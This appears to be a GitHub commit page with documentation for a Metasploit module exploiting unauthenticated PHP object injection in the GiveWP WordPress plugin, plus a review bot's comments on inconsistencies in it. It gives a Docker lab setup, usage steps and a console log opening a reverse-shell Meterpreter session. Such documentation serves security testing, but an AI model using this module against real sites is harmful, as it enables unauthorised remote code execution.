Land #19424, WordPress GiveWP Plugin RCE

adfoster-r7
2024-08-28 21:09:42 +01:00
committed by GitHub
3 changed files with 266 additions and 0 deletions
@@ -0,0 +1,94 @@
## Vulnerable Application
This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the
GiveWP plugin for WordPress (versions <= 3.14.1).
The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted
PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.
## Setup
1. **Docker Compose Setup**: Create the following `docker-compose.yml` file to set up a vulnerable WordPress environment:
```yaml
services:
db:
image: mysql:8.0.27
command: '--default-authentication-plugin=mysql_native_password'
restart: always
environment:
- MYSQL_ROOT_PASSWORD=somewordpress
- MYSQL_DATABASE=wordpress
- MYSQL_USER=wordpress
- MYSQL_PASSWORD=wordpress
expose:
- 3306
- 33060
wordpress:
image: wordpress:6.3.2
ports:
- "80:80"
restart: always
environment:
- WORDPRESS_DB_HOST=db
- WORDPRESS_DB_USER=wordpress
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_NAME=wordpress
volumes:
db_data:
```
1. Run Docker: `docker compose up`
1. Access the WordPress instance at `http://127.0.0.1` and complete the installation process
1. **Download and Install Vulnerable GiveWP Plugin**:
- Download the plugin: [GiveWP 3.14.1](https://downloads.wordpress.org/plugin/give.3.14.1.zip)
- Unzip the plugin and copy it to the Docker container:
```bash
docker compose cp give wordpress:/var/www/html/wp-content/plugins
```
- Access the WordPress instance at `http://localhost` and activate the GiveWP plugin via the admin dashboard.
1. **Create a Donation Form**:
- Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
- Select any form.
- Configure the form as needed, publish it.
## Options
No specific options need to be configured.
## Verification Steps
1. Start `msfconsole`.
2. Use the module with `use exploit/multi/http/wp_givewp_rce`.
3. Set `RHOSTS`, `RPORT`, and the necessary WordPress-specific options.
4. Run the exploit.
5. Gain a Meterpreter session.
## Scenarios
### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)
Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
```bash
msf6 > use exploit/multi/http/wp_givewp_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.3.2
[+] Detected GiveWP Plugin version: 3.14.1
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
[*] Using Form ID: 13 for exploitation.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200
meterpreter > sysinfo
Computer : 172.24.0.3
OS : Debian 11.8 (Linux 5.15.0-119-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
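Review bot: the Setup and Scenarios sections disagree on the target port. The compose file maps `- "80:80"` and the setup steps say to browse to `http://127.0.0.1` (later `http://localhost`), but the scenario runs the module as `run http://127.0.0.1:8888`; either change the mapping to `"8888:80"` or rerun the scenario against port 80 so a reader following the steps verbatim reproduces the documented output, and use one hostname throughout. Two smaller points: the Options section says no options need to be configured while Verification step 3 asks for "the necessary WordPress-specific options", so either name those options or drop the phrase; and the top-level `volumes: db_data:` is declared but no service mounts it, so attach it to the `db` service or remove it.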